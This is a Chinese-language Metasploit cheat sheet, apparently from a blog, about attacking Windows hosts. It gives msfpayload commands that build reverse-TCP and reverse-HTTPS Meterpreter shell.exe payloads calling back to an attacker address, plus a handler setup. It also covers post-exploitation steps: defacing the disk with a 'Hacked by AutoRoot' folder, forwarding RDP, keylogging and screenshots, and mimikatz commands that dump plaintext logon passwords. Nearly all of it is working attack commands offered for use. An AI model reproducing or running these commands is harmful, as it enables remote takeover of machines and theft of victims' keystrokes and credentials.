生成監聽用的shell.exe:
reverse_tcp(反向連接)
path : payload/windows/meterpreter/reverse_tcp
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=8080 X > ~/Desktop/shell.exe
reverse_http/https(反向連接)
path:payload/windows/meterpreter/reverse_http/https
msfpayload windows/meterpreter/reverse_https LHOST=192.168.1.2 LPORT=8080 X > ~/Desktop/shell.exe
通過http/https的方式反向連接,在網速慢的情況下不穩定,在某博客上看到https如果反彈沒有收到數據,可以將監聽端口換成443試試。
bind_tcp(正向連接)
path : payload/windows/meterpreter/bind_tcp
正向連接shell,因為在內網跨網段時無法連接到attack的機器,所以在內網中經常會使用,不需要設置LHOST。
利用shell.exe監聽:
msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.2 msf exploit(handler) > set LPORT 8080 msf exploit(handler) > exploit -j msf exploit(handler) >sessions
基本命令:
常用命令:
background:將當前會話放置后台 load/use:加載模塊 Interact:切換進一個信道 migrate:遷移進程 run:執行一個已有的模塊,這里要說的是輸入run后按兩下tab,會列出所有的已有的腳本,常用的有autoroute,hashdump,arp_scanner,multi_meter_inject等。 Resource:執行一個已有的rc腳本。
寫入文件夾:
meterpreter > pwd meterpreter > cd C:\\ meterpreter > pwd meterpreter > mkdir Hacked by AutoRoot meterpreter > ls
寫入內容:
edit + 文件,調用vi編輯。
網絡相關:
網絡命令則有列出ip信息(ipconfig),展示修改路由表(route),還有端口轉發(portfwd)
meterpreter > portfwd
meterpreter > portfwd add -l 1314 -p 3389 -r 192.168.1.2
在建立規則之后就可以連接本地1314端口,這樣遠程的3389端口就轉發出來了
鍵盤監聽:
meterpreter > screenshot meterpreter > keyscan_start meterpreter > keyscan_dump
注意一下windows會話窗口的概念,windows桌面划分為不同的會話(session),以便於與windows交互。會話0代表控制台,1,2 代表遠程桌面。所以要截獲鍵盤輸入必須在0中進行。可 以使用getdesktop查看或者截張圖試試。否則使用setdesktop切換。
如果不行就切換到explorer.exe進程中,這樣也可以監聽到遠程桌面連接進來之后的鍵盤輸入數據。
mimikatz:
抓取明文
第一條:privilege::debug //提升權限 第二條:sekurlsa::logonpasswords //抓取密碼